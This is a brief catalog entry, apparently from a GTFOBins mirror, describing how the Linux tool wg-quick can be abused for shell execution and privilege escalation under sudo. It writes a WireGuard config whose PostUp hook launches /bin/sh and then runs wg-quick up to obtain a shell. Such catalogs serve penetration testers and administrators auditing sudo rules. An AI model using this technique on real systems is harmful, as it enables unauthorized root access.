Catalog GTFOBins

GTFO · Tool

wg-quick

1 technique LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

Use `wg-quick down /path/to/temp-file.conf` in order to be able to run the shell again.

cat >/path/to/temp-file.conf <<EOF
[Interface]
PostUp = /bin/sh
EOF

wg-quick up /path/to/temp-file.conf
Context
sudo
Native
shell
MITRE
T1059